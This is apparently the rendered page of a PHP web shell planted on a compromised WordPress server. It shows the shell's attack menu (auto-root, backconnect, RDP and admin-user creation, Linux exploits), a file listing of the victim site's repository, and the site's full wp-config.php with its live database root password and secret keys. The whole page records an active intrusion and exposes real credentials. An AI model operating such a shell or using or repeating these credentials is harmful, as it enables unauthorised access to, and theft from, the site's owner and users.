Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 3.14.88.60
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
repo /
ansomone.com.ua.git /
[ HOME SHELL ]
Name
Size
Permission
Action
branches
[ DIR ]
drwsr-sr-x
hooks
[ DIR ]
drwsr-sr-x
info
[ DIR ]
drwsr-sr-x
objects
[ DIR ]
drwsr-sr-x
refs
[ DIR ]
drwsr-sr-x
wp-admin
[ DIR ]
drwxr-sr-x
wp-content
[ DIR ]
drwxr-sr-x
wp-includes
[ DIR ]
drwxr-sr-x
.htaccess
1.87
KB
-rwxr-xr-x
HEAD
23
B
-rwxr-xr-x
ORIG_HEAD
41
B
-rwxr-xr-x
config
66
B
-rwxr-xr-x
description
73
B
-rwxr-xr-x
index
531.48
KB
-rwxr-xr-x
index.html
60
B
-rwxr-xr-x
index.php
418
B
-rwxr-xr-x
license.txt
19.09
KB
-rwxr-xr-x
missing.html
1.46
KB
-rwxr-xr-x
php.ini
1.07
KB
-rwxr-xr-x
readme.html
10.61
KB
-rwxr-xr-x
robots.txt
1.49
KB
-rwxr-xr-x
sitemap.xml
2.67
KB
-rwxr-xr-x
sitemap.xml.gz
791
B
-rwxr-xr-x
welcome.html
984
B
-rwxr-xr-x
wp-activate.php
4.92
KB
-rwxr-xr-x
wp-blog-header.php
271
B
-rwxr-xr-x
wp-comments-post.php
1.34
KB
-rwxr-xr-x
wp-config-sample.php
3.01
KB
-rwxr-xr-x
wp-config.php
3.36
KB
-rwxr-xr-x
wp-cron.php
3.21
KB
-rwxr-xr-x
wp-links-opml.php
2.32
KB
-rwxr-xr-x
wp-load.php
3.24
KB
-rwxr-xr-x
wp-login.php
32.92
KB
-rwxr-xr-x
wp-mail.php
7.7
KB
-rwxr-xr-x
wp-settings.php
12.72
KB
-rwxr-xr-x
wp-signup.php
27.92
KB
-rwxr-xr-x
wp-trackback.php
3.94
KB
-rwxr-xr-x
xmlrpc.php
2.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.php
<?php /** * The base configurations of the WordPress. * * This file has the following configurations: MySQL settings, Table Prefix, * Secret Keys, WordPress Language, and ABSPATH. You can find more information * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Codex page. You can get the MySQL settings from your web host. * * This file is used by the wp-config.php creation script during the * installation. You don't have to use the web site, you can just copy this file * to "wp-config.php" and fill in the values. * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'ansomone'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'mysqlqwe123'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); define('WP_TEMP_DIR', ini_get('upload_tmp_dir')); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', ' ly$li33;rQ#H^%|,L1[-)|Iv#+-ua|vi:_nYMd/|[7dhy?D+fp{5xf1Z?C7,^d_'); define('SECURE_AUTH_KEY', '<y.a*D6?tL:P&>4hz]i!Duai9xEi8.r#]||Ub$kzB?-i<}Lj(q]E+|9D-+~@F}[9'); define('LOGGED_IN_KEY', 'cDS44$=9RH:Ywd.C:p-i/Z@Rp-x6k0RH%) >0q4{,|M|AGOXrXpdU&F6lexaauzK'); define('NONCE_KEY', 'i8+Y|V&(|*BPuRzpbQei032r|kki]Mq;M.*D>>1C6aQjQJ|^j{Z@Npnz<IC2>17O'); define('AUTH_SALT', 'IsLDHw;2&e+;Y*qIf!Z?Pi1vEi;J3v3sBS`A}<:O^@Vfyj8]vGb2,s|-Z,/.,E{q'); define('SECURE_AUTH_SALT', 'juJ?U__ksmWi$)e&j)v_Rll(ODmd>WpvmL@lf+-t:}`s.dV1_La5rb>)#PbMO; Y'); define('LOGGED_IN_SALT', 'kxf}`TC&vHfN*1 b>a`DzJA1L|p{r]*XYm1_l%;tzo@:a#2qDvEUG+9[/>XdIKqo'); define('NONCE_SALT', 'cM:*a#RUG=S|+E)yG;@jN+CoZycp;4yKgC;vCT/H&+Ak6W<JSL~zkkvL@<lzp}H_'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each a unique * prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * WordPress Localized Language, defaults to English. * * Change this to localize WordPress. A corresponding MO file for the chosen * language must be installed to wp-content/languages. For example, install * de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German * language support. */ define('WPLANG', ''); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php'); define('FS_METHOD', 'direct');
Close